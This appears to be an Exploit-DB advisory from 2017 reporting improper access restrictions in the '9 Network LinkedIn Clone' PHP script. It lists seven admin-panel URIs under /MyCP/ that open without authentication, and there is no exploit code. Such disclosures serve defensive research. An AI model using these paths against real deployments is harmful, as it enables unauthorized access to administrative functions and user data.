9 Network Linkedin Clone Script - Improper Access Restrictions

EDB-ID:

41060

CVE:

N/A

EDB Verified:

Author:

Ihsan Sencan

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2017-01-15

Vulnerable App:

# # # # # 
# Vulnerability: Improper Access Restrictions 
# Date: 15.01.2017
# Vendor Homepage: http://theninehertz.com
# Script Name: 9 network Linkedin Clone – Classified Ads Script
# Script Version: v1.0
# Script Buy Now: http://theninehertz.com/linkedin-clone
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Direct entrance..
# An attacker can exploit this issue via a browser.
# The following example URIs are available:
# http://localhost/[PATH]/MyCP/welcome.php
# http://localhost/[PATH]/MyCP/industry-list.php
# http://localhost/[PATH]/MyCP/active_user.php
# http://localhost/[PATH]/MyCP/deactive_user.php
# http://localhost/[PATH]/MyCP/unverified_user.php
# http://localhost/[PATH]/MyCP/job-list.php
# http://localhost/[PATH]/MyCP/job-pack.php
# Vs.......
# # # # #

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services